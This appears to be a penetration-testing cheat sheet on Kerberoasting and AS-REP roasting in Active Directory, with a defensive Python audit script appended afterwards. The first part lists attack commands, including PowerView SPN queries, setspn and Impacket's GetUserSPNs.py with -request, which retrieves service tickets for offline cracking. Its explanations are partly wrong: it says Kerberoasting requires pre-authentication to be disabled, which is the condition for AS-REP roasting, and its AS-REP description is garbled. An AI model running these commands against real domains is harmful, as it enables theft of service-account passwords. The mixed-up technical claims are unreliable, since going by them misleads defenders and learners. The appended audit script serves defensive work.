Finding Kerberoastable users

It requests a TGS and needs Kerberos pre-authentication to be disabled.
Kerberoasting will not work for COMPUTER$ accounts, as the service ticket is encrypted with the machine account's password.
But if the requested SPN is registered for a user account rather than a computer account, the user's password is used to encrypt the service ticket.


Get-DomainUser -SPN -Properties distinguishedname,serviceprincipalname [-Domain FOREIGN]


cscript.exe GetUserSPNs.vbs

Impacket: GetUserSPNs.py <domain_name>/<username>:<password> -dc-ip <dc_ip> -request


This will produce quite a large output and will need manual triage (check for USER accounts):

setspn -T <DOMAIN> -F -Q */*

ASREP Roasting

AS-REP roasting requests a TGT, not a TGS. Kerberos pre-authentication does not need to be enabled.


Get-DomainUser -PreauthNoRequired -Properties distinguishedname
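
For defenders who want to audit their own directory for both exposures, the following added example (not part of the original page) applies the two conditions above to an offline account export: an SPN registered on a user rather than a computer account, and the "do not require pre-authentication" flag. The CSV column layout, the `audit` function and the sample rows are constructed for illustration.

```python
import csv
import io

# Documented userAccountControl bit values.
UAC_ACCOUNTDISABLE = 0x0002
UAC_WORKSTATION_TRUST = 0x1000   # domain-joined computer
UAC_SERVER_TRUST = 0x2000        # domain controller
UAC_DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed sample export. The column layout (";"-joined SPNs) is an assumption.
SAMPLE_EXPORT = """sAMAccountName,userAccountControl,servicePrincipalName
svc_sql,512,MSSQLSvc/sql01.corp.example:1433
WS01$,4096,HOST/WS01;TERMSRV/WS01
DC01$,532480,ldap/DC01.corp.example
j.doe,4194816,
svc_old,514,HTTP/intranet.corp.example
svc_web,4260352,HTTP/web01.corp.example
alice,512,
"""


def audit(export_text):
    """Return accounts exposed to each technique as (name, enabled) tuples."""
    findings = {"kerberoastable": [], "asrep_roastable": []}
    for row in csv.DictReader(io.StringIO(export_text)):
        uac = int(row["userAccountControl"])
        # Disabled accounts are still reported so they can be cleaned up
        # before anyone re-enables them.
        entry = (row["sAMAccountName"], not uac & UAC_ACCOUNTDISABLE)
        is_machine = bool(uac & (UAC_WORKSTATION_TRUST | UAC_SERVER_TRUST))
        spns = [s for s in row["servicePrincipalName"].split(";") if s]
        # An SPN on a user account means the service ticket is encrypted
        # with the user's password; machine accounts are skipped.
        if spns and not is_machine:
            findings["kerberoastable"].append(entry)
        if uac & UAC_DONT_REQ_PREAUTH:
            findings["asrep_roastable"].append(entry)
    return findings


if __name__ == "__main__":
    for technique, accounts in audit(SAMPLE_EXPORT).items():
        for name, enabled in accounts:
            print(f"{technique}: {name} ({'enabled' if enabled else 'disabled'})")
```

Accounts in either list are candidates for long random passwords (or a group managed service account, for services) and for having pre-authentication switched back on.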